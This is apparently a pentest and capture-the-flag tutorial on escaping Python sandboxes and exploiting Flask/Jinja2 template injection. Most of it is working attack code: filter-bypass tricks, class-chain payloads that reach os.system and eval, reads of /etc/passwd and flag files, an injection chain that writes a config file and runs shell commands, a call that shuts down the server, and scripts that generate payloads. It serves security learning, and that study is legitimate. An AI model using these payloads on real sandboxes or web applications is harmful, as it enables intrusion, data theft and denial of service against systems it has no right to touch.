Python Sandbox Escape

In some OJ providing python sandbox, or web site written in python and using template rendering (ssti appears), your pentest must have something to do with python sandbox escape.

Python2 Sandbox Escape

When you are in a restricted python environment, to get rid of every limits and spawn a shell is the main target, but kind of tricky.
Our final aim is to get shell with the help of os,

import os
os.system('ifconfig')
os.popen('ifconfig')

and eval/exec,

eval('__import__("os").system("dir")')

and pty,

import pty
pty.spawn('ls')

and subprocess,

import subprocess
subprocess.call(['ifconfig'],shell=True)
subprocess.Popen('ls', shell=True)

and commands,

import commands
commands.getoutput('ifconfig')
commands.getstatusoutput('ifconfig')

and timeit,

import timeit
timeit.timeit("__import__('os').system('dir')",number=1)

and platform,

import platform
print platform.popen('dir').read()

and other modules.

import Techniques

You may easily notice that most methods needs import, therefore importing libs is a good choice.

Ways to Import

As defenders will not make it easy, there should be filters and checks to prevent possible attacks.
The basic idea is to check code content, like

import re
code = open('code.py').read()
pattern  = re.compile('import\s+(os|commands|subprocess|sys)')
match = re.search(pattern,code)
if match:
    print "forbidden module import detected"
    raise Exception

But we have other ways to import

• import

  import xxx`
  from x import xxx

• __import__

  __import__('xxx')

• importlib

  import importlib`
  f3ck = importlib.import_module("pbzznaqf".decode('rot_13')
  # bypass filters, decoded as 'commands' 
  print f3ck.getoutput('ifconfig')

  Ways to Reload

  Builtin functions work with no need of import, because they are imported automatically along with __builtin__ module being loaded.

Then functions like open(), int() and chr() are equivalent to

__builtin__.open()
__builtin__.int()
__builtin__.chr()

Therefore eval(), exec(), execfile() and __import__ can be executed in this way.
Other ways to operate

print [entity for entity in ().__class__.__bases__[0].__subclasses__() if entity.__name__ == "file"][0]("index.wsgi").read()
print globals()["__builtins__"]["open"]("index.wsgi").read()
print globals()["__builtins__"]["file"]("index.wsgi").read()
print globals()["__builtins__"]["file"]("index.wsgi").read()
print dir()["__builtins__"]["file"]("index.wsgi").read()
print dir()["__builtins__"]["open"]("index.wsgi").read()
print __import__('__builtin__').open("index.wsgi").read()
print __import__('__builtin__').file("index.wsgi").read()

So if we try to defend, delete them by using

del __builtins__.__dict__['__import__'] # __import__ is the function called by the import statement
del __builtins__.__dict__['eval'] # evaluating code could be dangerous
del __builtins__.__dict__['execfile'] # likewise for executing the contents of a file
del __builtins__.__dict__['input'] # Getting user input and evaluating it might be dangerous
# or
del __builtin__.chr

It’s ok because we can recovery the complete module by

reload(__builtin__)

While the truth is, reload is a method under __builtin__, so what if it is deleted already?

We have a module called imp to deal this

import imp
imp.reload(__builtin__)

Notice that a module can be reloaded only after it is imported.

Advanced

We import libs/modules which are already in local file system, so why dont we remove them from disk firstly?
Question is where exactly are they?

Use sys to show path

>>> import sys
>>> sys.path
 
['',
 '/usr/lib/python2.7',
 '/usr/lib/python2.7/plat-x86_64-linux-gnu',
 '/usr/lib/python2.7/lib-tk',
 '/usr/lib/python2.7/lib-old',
 '/usr/lib/python2.7/lib-dynload',
 '/usr/local/lib/python2.7/dist-packages',
 '/usr/lib/python2.7/dist-packages',
 '/usr/lib/python2.7/dist-packages/gtk-2.0',
 ...]

It surely contains package directory of pip and conda and other related folders.

Show where a module is

>>> import os		# import first
>>> os.__file__		# attribute xxx.__file__
'/usr/lib/python2.7/os.pyc'

Then look at modules under sys

>>> sys.modules

{'copy_reg': <module 'copy_reg' from '/usr/lib/python2.7/copy_reg.pyc'>,
 'sre_compile': <module 'sre_compile' from '/usr/lib/python2.7/sre_compile.pyc'>, 
 ...,
 'os': <module 'os' from '/usr/lib/python2.7/os.pyc'>, '_weakref': <module '_weakref' (built-in)>}

Change something to see what happens

>>> sys.modules['os']=None
>>> import os
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ImportError: No module named os

So we guess, python import modules according to sys.modules, defenders can delete modules in this dict for protection.

What’s the deal? We do the reverse.

>>> import sys
>>> sys.modules['os']='/usr/lib/python2.7/os.py'
>>> import os

Ultimate

If sys, os and reload are banned, still a way to bypass?

Sure it is.

>>> execfile('/usr/lib/python2.7/os.py')
>>> system('cat /etc/passwd')
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
>>> getcwd()
'/usr/lib/python2.7'

If execfile is banned, use file i/o operations to read, then use exec to execute codes. It suits python 3.x

with open('/usr/lib/python3.6/os.py','r') as f:
    exec(f.read())
system('ls')

As a defender, delete the module file is the last strike.
Finally it’s hard to bypass, but the server may be fragile for lacking dependencies.

Explore Attrs & Methods

use dir() method or __dict__ attribute, to list all properties and functions under a specific module/class/object.

>>> A.__dict__
mappingproxy({'b': 'asdas', '__dict__': <attribute '__dict__' of 'A' objects>, 'a': 1, '__doc__': None, '__weakref__': <attribute '__weakref__' of 'A' objects>, 'c': <function A.c at 0x7f18ea25e510>, '__module__': '__main__'})
>>> dir(A)
['__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', 'a', 'b', 'c']

They have differences, like dir suits every module, while __dict__ may not exist in some.

>>> dir()
['__builtins__', '__doc__', '__name__', '__package__']
>>> dir(__doc__)
['__class__', '__delattr__', '__doc__', '__format__', '__getattribute__', '__hash__', '__init__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__']
>>> __doc__.__dict__
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'NoneType' object has no attribute '__dict__'

Besides, dir gives a list, and __dict__ gives a dict containing values.

>>> dir()
['__builtins__', '__doc__', '__name__', '__package__']
>>> import lxml
>>> dir(lxml)
['__builtins__', '__doc__', '__file__', '__name__', '__package__', '__path__', '__version__', 'get_include']
>>> lxml.__dict__
{'get_include': <function get_include at 0x7fb1ad84ad50>, 
'__builtins__': {'bytearray': <type 'bytearray'>, 
...}

Bypass String Scanning

Defenders always filter special strings, so we have to change string to bypass.

First we can do python string inversion tricks

str = "txt.galf"
restr = str [::-1]
().__class__.__bases__[0].__subclasses__()[40]('r',restr)).read()
# ().__class__.__bases__[0].__subclasses__()[40]('r','flag.txt')).read()

and string concatenation

().__class__.__bases__[0].__subclasses__()[40]('r','fla'+'g.txt')).read()
# ().__class__.__bases__[0].__subclasses__()[40]('r','flag.txt')).read()

if method name is filtered, use __getattribute__() or __getattr__() or getattr()or __dict__, combine with str concat

x = [x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'ca'+'tch_warnings'][0].__init__
x.__getattribute__("func_global"+"s")['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('l'+'s')
x.__getattribute__("func_global"+"s")['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ca'+'t /home/ctf/flag')

# As for `func_globals`, each func_* will give you surprise

Secondly we do characters encoding

import codecs
getattr(os,codecs.encode("flfgrz",'rot13'))('ifconfig')
# execute `ifconfig`
# 'getattr' combine module with its methods/attrs
# "flfgrz" can be decoded as system

Base64 is common

>>> import base64
>>> base64.b64encode('__import__')
'X19pbXBvcnRfXw=='
>>> base64.b64encode('os')
'b3M='
>>> __builtins__.__dict__['X19pbXBvcnRfXw=='.decode('base64')]('b3M='.decode('base64'))
<module 'os' from '/usr/lib/python2.7/os.pyc'>

But what if [ and ] are filtered? We use __getitem__ to replace.
It is based on: func[‘attr’] === func.attr.

>>> ''.__class__.__mro__[1]
object
>>> ''.__class__.__mro__.__getitem__(1)
object

What if ' and " are also filtered? The solution is not for normal python sandbox, it’s for python web environment.
In web framework like flask, use request

# request.args.xx
>>> {{[].__class__.__mro__[1].__subclasses__()[40](request.args.s1mple).read()}}&s1mple=/etc/passwd

And what if __ is filtered as well? We still use request.

>>> ()[request.args.class].bases[0].subclasses()[59].init.globals.builtins'eval'&class=class

What if {{` and `}} …… ? Use {%if xxxxx}1{% endif %} instead.

Using Class Object

__mro__ method gives a list of parent classes inherited by this.
MRO( Method Resolution Order ) indicates that it is associated with inheritance mechanism ( python is multi-inherence ).

>>> 1..__class__.__mro__
(float, object)
>>> "".__class__.__mro__
(str, basestring, object)

__subclasses__ method gives a list of subclasses

''.__class__.__mro__[2].__subclasses__()

So we can use __mro__ and __subclasses__ to get object and useful method. __bases__ can also be used, and it is a part of __mro__ list.

We have file io payloads down here

# use 'file' class to read and write
"".__class__.__mro__[-1].__subclasses__()[40](filename).read()
''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()
''.__class__.__mro__[2].__subclasses__()[40]('/tmp/owned.cfg', 'w').write('<malicious code here>'')
().__class__.__bases__[0].__subclasses__()[40](r'xxx').read()
().__class__.__bases__[0].__subclasses__()[40]('xxxx', 'w').write('xxx')

If ssti exists, we can use it to get shell

''.__class__.__mro__[2].__subclasses__()[40]('/tmp/owned.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n')
config.from_pyfile('/tmp/owned.cfg')
config['RUNCMD']('/usr/bin/id',shell=True)
# dos for flash ssti
request.environ['werkzeug.server.shutdown']()

# if some string is filtered, split it
config['RUNCMD']('a=l;b=s;$a$b /var/www/html/',shell=True)

# base64 encode
config['RUNCMD']('echo cHJpbnQgb3BlbignL3Zhci93d3cvaHRtbC9mbDRnJywncicpLnJlYWQoKQ==|base64 -d>/tmp/get.py',shell=True)
# that is
config['RUNCMD']('echo print open('/var/www/html/fl4g','r').read()>/tmp/get.py
# then
config['RUNCMD']('python /tmp/get.py',shell=True)

Ways to get shell

# identify a class index first
import warnings
[].__class__.__base__.__subclasses__().index(warnings.catch_warnings)
# then use it
[].__class__.__mro__[-1].__subclasses__()[59].__init__.__globals__['linecache'].__dict__['os'].system('ls')
().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['linecache'].__builtins__['eval']("__import__('os').system('whoami')")
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls  /var/www/html").read()' )
# site._Printer
[].__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].system('xxx')
''.__class__.__mro__[-1].__subclasses__()[71]._Printer__setup.__globals__['os'].system('xxx')
# builtin_function_or_method
"".__class__.__mro__[-1].__subclasses__()[29].__call__(eval,’os.system(“ls”)’)

# simple one
[].__getattribute__('append').__class__.__call__(eval, '1+1')

# some specials
getattr(__import__('types').__builtins__['__tropmi__'[::-1]]('so'[::-1]), 'mets' 'ys'[::-1])('whoami')

# bypass
# `[` and `]` are banned, use `pop()` instead
[].__class__.__mro__[-1].__subclasses__().pop(71).__init__.__globals__.pop('os').system('xxx')

Python3 Sandbox Escape

Builtin Functions

__builtin__ in python 2.x ==> builtins in python3.x, and needs import.
But finally they all have __builtins__, the reference to builtin modules.

File Operations

file in python 2.x => open in python 3.x.

Class Object Payloads

As python 2.x has different inheritance chain with python 3.x, so we
Some payloads in python 3.7

# still needs to find a class index()
import warnings
xxx = [].__class__.__base__.__subclasses__().index(warnings.catch_warnings) 
# then use it
().__class__.__bases__[0].__subclasses__()[xxx].__init__.__globals__['__builtins__']['open']('/etc/passwd').read()

().__class__.__bases__[0].__subclasses__()[xxx].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()") 

Things Change in different python version environment !!!
so sometimes it will be like

().__class__.__bases__[0].__subclasses__()[xxx].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")

[].__class__.__base__.__subclasses__()[xxx].__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()")

and os._wrap_close

import os
nnn = [].__class__.__base__.__subclasses__().index(os._wrap_close)
''.__class__.__mro__[-1].__subclasses__()[nnn].__init__.__globals__['system']('whoami')

Scripts

Here is a script for generating payloads of ssti in flask using jinja2

#!/usr/bin/python3
# coding=utf-8
# python 3.5
from flask import Flask 	# optional
from jinja2 import Template # optional
# Some of special names
searchList = ['__init__', "__new__", '__del__', '__repr__', '__str__', '__bytes__', '__format__', '__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__', '__hash__', '__bool__', '__getattr__', '__getattribute__', '__setattr__', '__dir__', '__delattr__', '__get__', '__set__', '__delete__', '__call__', "__instancecheck__", '__subclasscheck__', '__len__', '__length_hint__', '__missing__','__getitem__', '__setitem__', '__iter__','__delitem__', '__reversed__', '__contains__', '__add__', '__sub__','__mul__']
neededFunction = ['eval', 'open', 'exec']
pay = int(input("Payload?[1|0]"))
for index, i in enumerate({}.__class__.__base__.__subclasses__()):
    for attr in searchList:
        if hasattr(i, attr):
            if eval('str(i.'+attr+')[1:9]') == 'function':
                for goal in neededFunction:
                    if (eval('"'+goal+'" in i.'+attr+'.__globals__["__builtins__"].keys()')):
                        if pay != 1:
                            print(i.__name__,":", attr, goal)
                        else:
                            print("{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='" + i.__name__ + "' %}{{ c." + attr + ".__globals__['__builtins__']." + goal + "(\"[evil]\") }}{% endif %}{% endfor %}")

Another script for detecting modules with os, sys or __builtin__ that we can exploit. Effective for python 2.x/3.x

#-*- coding:utf8 -*-
# 'all_modules_2' is for python2.x
# 'all_modules_3' is for python3.x
all_modules_2 = [
    'BaseHTTPServer', 'imaplib', 'shelve', 'Bastion', 'anydbm', 'imghdr', 'shlex', 'CDROM', 'argparse', 'imp', 'shutil', 'CGIHTTPServer', 'array', 'importlib', 'signal', 'Canvas', 'ast', 'imputil', 'site', 'ConfigParser', 'asynchat', 'inspect', 'sitecustomize', 'Cookie', 'asyncore', 'io', 'smtpd', 'DLFCN', 'atexit', 'itertools', 'smtplib', 'Dialog', 'audiodev', 'json', 'sndhdr', 'DocXMLRPCServer', 'audioop', 'keyword', 'socket', 'FileDialog', 'base64', 'lib2to3', 'spwd', 'FixTk', 'bdb', 'linecache', 'sqlite3', 'HTMLParser', 'binascii', 'linuxaudiodev', 'sre', 'IN', 'binhex', 'locale', 'sre_compile', 'MimeWriter', 'bisect', 'logging', 'sre_constants', 'Queue', 'bsddb', 'lsb_release', 'sre_parse', 'ScrolledText', 'bz2', 'macpath', 'ssl', 'SimpleDialog', 'cPickle', 'macurl2path', 'stat', 'SimpleHTTPServer', 'cProfile', 'mailbox', 'statvfs', 'SimpleXMLRPCServer', 'cStringIO', 'mailcap', 'string', 'SocketServer', 'calendar', 'markupbase', 'stringold', 'StringIO', 'cgi', 'marshal', 'stringprep', 'TYPES', 'cgitb', 'math', 'strop', 'Tix', 'chunk', 'md5', 'struct', 'Tkconstants', 'cmath', 'mhlib', 'subprocess', 'Tkdnd', 'cmd', 'mimetools', 'sunau', 'Tkinter', 'code', 'mimetypes', 'sunaudio', 'UserDict', 'codecs', 'mimify', 'symbol', 'UserList', 'codeop', 'mmap', 'symtable', 'UserString', 'collections', 'modulefinder', 'sys', '_LWPCookieJar', 'colorsys', 'multifile', 'sysconfig', '_MozillaCookieJar', 'commands', 'multiprocessing', 'syslog', '__builtin__', 'compileall', 'mutex', 'tabnanny', '__future__', 'compiler', 'netrc', 'talloc', '_abcoll', 'contextlib', 'new', 'tarfile', '_ast', 'cookielib', 'nis', 'telnetlib', '_bisect', 'copy', 'nntplib', 'tempfile', '_bsddb', 'copy_reg', 'ntpath', 'termios', '_codecs', 'crypt', 'nturl2path', 'test', '_codecs_cn', 'csv', 'numbers', 'textwrap', '_codecs_hk', 'ctypes', 'opcode', '_codecs_iso2022', 'curses', 'operator', 'thread', '_codecs_jp', 'datetime', 'optparse', 'threading', '_codecs_kr', 'dbhash', 'os', 'time', '_codecs_tw', 'dbm', 'os2emxpath', 'timeit', '_collections', 'decimal', 'ossaudiodev', 'tkColorChooser', '_csv', 'difflib', 'parser', 'tkCommonDialog', '_ctypes', 'dircache', 'pdb', 'tkFileDialog', '_ctypes_test', 'dis', 'pickle', 'tkFont', '_curses', 'distutils', 'pickletools', 'tkMessageBox', '_curses_panel', 'doctest', 'pipes', 'tkSimpleDialog', '_elementtree', 'dumbdbm', 'pkgutil', 'toaiff', '_functools', 'dummy_thread', 'platform', 'token', '_hashlib', 'dummy_threading', 'plistlib', 'tokenize', '_heapq', 'email', 'popen2', 'trace', '_hotshot', 'encodings', 'poplib', 'traceback', '_io', 'ensurepip', 'posix', 'ttk', '_json', 'errno', 'posixfile', 'tty', '_locale', 'exceptions', 'posixpath', 'turtle', '_lsprof', 'fcntl', 'pprint', 'types', '_md5', 'filecmp', 'profile', 'unicodedata', '_multibytecodec', 'fileinput', 'pstats', 'unittest', '_multiprocessing', 'fnmatch', 'pty', 'urllib', '_osx_support', 'formatter', 'pwd', 'urllib2', '_pyio', 'fpformat', 'py_compile', 'urlparse', '_random', 'fractions', 'pyclbr', 'user', '_sha', 'ftplib', 'pydoc', 'uu', '_sha256', 'functools', 'pydoc_data', 'uuid', '_sha512', 'future_builtins', 'pyexpat', 'warnings', '_socket', 'gc', 'quopri', 'wave', '_sqlite3', 'genericpath', 'random', 'weakref', '_sre', 'getopt', 're', 'webbrowser', '_ssl', 'getpass', 'readline', 'whichdb', '_strptime', 'gettext', 'repr', 'wsgiref', '_struct', 'glob', 'resource', 'xdrlib', '_symtable', 'grp', 'rexec', 'xml', '_sysconfigdata', 'gzip', 'rfc822', 'xmllib', '_sysconfigdata_nd', 'hashlib', 'rlcompleter', 'xmlrpclib', '_testcapi', 'heapq', 'robotparser', 'xxsubtype', '_threading_local', 'hmac', 'runpy', 'zipfile', '_warnings', 'hotshot', 'sched', 'zipimport', '_weakref', 'htmlentitydefs', 'select', 'zlib', '_weakrefset', 'htmllib', 'sets', 'abc', 'httplib', 'sgmllib', 'aifc', 'ihooks', 'sha'
]

all_modules_3 = [
    'AptUrl', 'hmac', 'requests_unixsocket', 'CommandNotFound', 'apport', 'hpmudext', 'resource', 'Crypto', 'apport_python_hook', 'html', 'rlcompleter', 'DistUpgrade', 'apt', 'http', 'runpy', 'HweSupportStatus', 'apt_inst', 'httplib2', 'scanext', 'LanguageSelector', 'apt_pkg', 'idna', 'sched', 'NvidiaDetector', 'aptdaemon', 'imaplib', 'secrets', 'PIL', 'aptsources', 'imghdr', 'secretstorage', 'Quirks', 'argparse', 'imp', 'select', 'UbuntuDrivers', 'array', 'importlib', 'selectors', 'UbuntuSystemService', 'asn1crypto', 'inspect', 'shelve', 'UpdateManager', 'ast', 'io', 'shlex', '__future__', 'asynchat', 'ipaddress', 'shutil', '_ast', 'asyncio', 'itertools', 'signal', '_asyncio', 'asyncore', 'janitor', 'simplejson', '_bisect', 'atexit', 'json', 'site', '_blake2', 'audioop', 'keyring', 'sitecustomize', '_bootlocale', 'base64', 'keyword', 'six', '_bz2', 'bdb', 'language_support_pkgs', 'smtpd', '_cffi_backend', 'binascii', 'launchpadlib', 'smtplib', '_codecs', 'binhex', 'linecache', 'sndhdr', '_codecs_cn', 'bisect', 'locale', 'socket', '_codecs_hk', 'brlapi', 'logging', 'socketserver', '_codecs_iso2022', 'builtins', 'louis', 'softwareproperties', '_codecs_jp', 'bz2', 'lsb_release', 'speechd', '_codecs_kr', 'cProfile', 'lzma', 'speechd_config', '_codecs_tw', 'cairo', 'macaroonbakery', 'spwd', '_collections', 'calendar', 'macpath', 'sqlite3', '_collections_abc', 'certifi', 'macurl2path', 'sre_compile', '_compat_pickle', 'cgi', 'mailbox', 'sre_constants', '_compression', 'cgitb', 'mailcap', 'sre_parse', '_crypt', 'chardet', 'mako', 'ssl', '_csv', 'chunk', 'markupsafe', 'stat', '_ctypes', 'cmath', 'marshal', 'statistics', '_ctypes_test', 'cmd', 'math', 'string', '_curses', 'code', 'mimetypes', 'stringprep', '_curses_panel', 'codecs', 'mmap', 'struct', '_datetime', 'codeop', 'modual_test', 'subprocess', '_dbm', 'collections', 'modulefinder', 'sunau', '_dbus_bindings', 'colorsys', 'multiprocessing', 'symbol', '_dbus_glib_bindings', 'compileall', 'nacl', 'symtable', '_decimal', 'concurrent', 'netrc', 'sys', '_dummy_thread', 'configparser', 'nis', 'sysconfig', '_elementtree', 'contextlib', 'nntplib', 'syslog', '_functools', 'copy', 'ntpath', 'systemd', '_gdbm', 'copyreg', 'nturl2path', 'tabnanny', '_hashlib', 'crypt', 'numbers', 'tarfile', '_heapq', 'cryptography', 'oauth', 'telnetlib', '_imp', 'csv', 'olefile', 'tempfile', '_io', 'ctypes', 'opcode', 'termios', '_json', 'cups', 'operator', 'test', '_locale', 'cupsext', 'optparse', 'textwrap', '_lsprof', 'cupshelpers', 'orca', '_lzma', 'curses', 'os', 'threading', '_markupbase', 'datetime', 'ossaudiodev', 'time', '_md5', 'dbm', 'parser', 'timeit', '_multibytecodec', 'dbus', 'pathlib', 'token', '_multiprocessing', 'deb822', 'pcardext', 'tokenize', '_opcode', 'debconf', 'pdb', 'trace', '_operator', 'debian', 'pexpect', 'traceback', '_osx_support', 'debian_bundle', 'pickle', 'tracemalloc', '_pickle', 'decimal', 'pickletools', 'tty', '_posixsubprocess', 'defer', 'pipes', 'turtle', '_pydecimal', 'difflib', 'pkg_resources', 'types', '_pyio', 'dis', 'pkgutil', 'typing', '_random', 'distro_info', 'platform', 'ufw', '_sha1', 'distro_info_test', 'plistlib', 'unicodedata', '_sha256', 'distutils', 'poplib', 'unittest', '_sha3', 'doctest', 'posix', 'urllib', '_sha512', 'dummy_threading', 'posixpath', 'urllib3', '_signal', 'email', 'pprint', 'usbcreator', '_sitebuiltins', 'encodings', 'problem_report', 'uu', '_socket', 'enum', 'profile', 'uuid', '_sqlite3', 'errno', 'pstats', 'venv', '_sre', 'faulthandler', 'pty', 'wadllib', '_ssl', 'fcntl', 'ptyprocess', 'warnings', '_stat', 'filecmp', 'pwd', 'wave', '_string', 'fileinput', 'py_compile', 'weakref', '_strptime', 'fnmatch', 'pyatspi', 'webbrowser', '_struct', 'formatter', 'pyclbr', 'wsgiref', '_symtable', 'fractions', 'pydoc', 'xdg', '_sysconfigdata_m_linux_x86_64-linux-gnu', 'ftplib', 'pydoc_data', 'xdrlib', '_testbuffer', 'functools', 'pyexpat', 'xkit', '_testcapi', 'gc', 'pygtkcompat', 'xml', '_testimportmultiple', 'genericpath', 'pymacaroons', 'xmlrpc', '_testmultiphase', 'getopt', 'pyrfc3339', 'xxlimited', '_thread', 'getpass', 'pytz', 'xxsubtype', '_threading_local', 'gettext', 'queue', 'yaml', '_tracemalloc', 'gi', 'quopri', 'zipapp', '_warnings', 'glob', 'random', 'zipfile', '_weakref', 'grp', 're', 'zipimport', '_weakrefset', 'gtweak', 'readline', 'zlib', '_yaml', 'gzip', 'reportlab', 'zope', 'abc', 'hashlib', 'reprlib', 'aifc', 'heapq'
]

methods = ['os', 'sys', '__builtins__']

results = {}
for module in all_modules_3:
    results[module] = {
        'flag': 0,
        'result': {}
    }

    try:
        m = __import__(module)
        attrs = dir(m)
        for method in methods:
            if method in attrs:
                result = 'yes'
                results[module]['flag'] = 1
            else:
                result = 'no'

            results[module]['result'][method] = result

    except Exception as e:
        print(e)

for result in results:
    if results[result]['flag']:
        print('[+]' + result)
        for r in results[result]['result']:
            print('  [-]' + r + ': ' + results[result]['result'][r])